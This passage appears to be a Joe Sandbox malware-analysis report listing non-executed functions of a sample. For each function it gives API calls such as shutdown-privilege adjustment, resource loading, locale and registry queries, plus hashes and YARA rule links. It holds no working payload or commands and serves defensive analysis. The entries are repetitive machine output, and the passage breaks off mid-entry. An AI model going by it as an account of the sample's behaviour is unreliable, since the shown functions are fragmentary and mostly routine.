                                                                                                                                                                                                                                  • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                  • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                  • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                                                                                                  • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409C34 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                                                                  • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                                                                                                                                                  • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00405258 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                  • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                                                                                                                                                  • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SystemTime
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2656138-0
                                                                                                                                                                                                                                  • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                                                                                                                                  • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00405CF4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                                                  • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                                                                                                                                                  • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040840C Relevance: .5, Instructions: 545COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                                                                                                                                                  • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 4190037839-2401316094
                                                                                                                                                                                                                                  • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                                                                                                                                                  • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                                                                                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1694776339-0
                                                                                                                                                                                                                                  • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                                                                                  • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004053C4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                                                                                                                                                                    • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                                                                                                                                    • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale$DefaultSystem
                                                                                                                                                                                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                  • API String ID: 1044490935-665933166
                                                                                                                                                                                                                                  • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                                                                                                                                                  • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(0066ADB0,00000000,00401AB4), ref: 00401A1B
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,0066ADB0,00000000,00401AB4), ref: 00401A3A
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(0066BDB0,?,00000000,00008000,0066ADB0,00000000,00401AB4), ref: 00401A79
                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                                                                                                                                                  • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3782394904-0
                                                                                                                                                                                                                                  • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                                                                                                  • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitMessageProcess
                                                                                                                                                                                                                                  • String ID: Error$Runtime error at 00000000$9@
                                                                                                                                                                                                                                  • API String ID: 1220098344-1503883590
                                                                                                                                                                                                                                  • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                                                                                                  • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 262959230-0
                                                                                                                                                                                                                                  • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                                                                                                                                                  • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
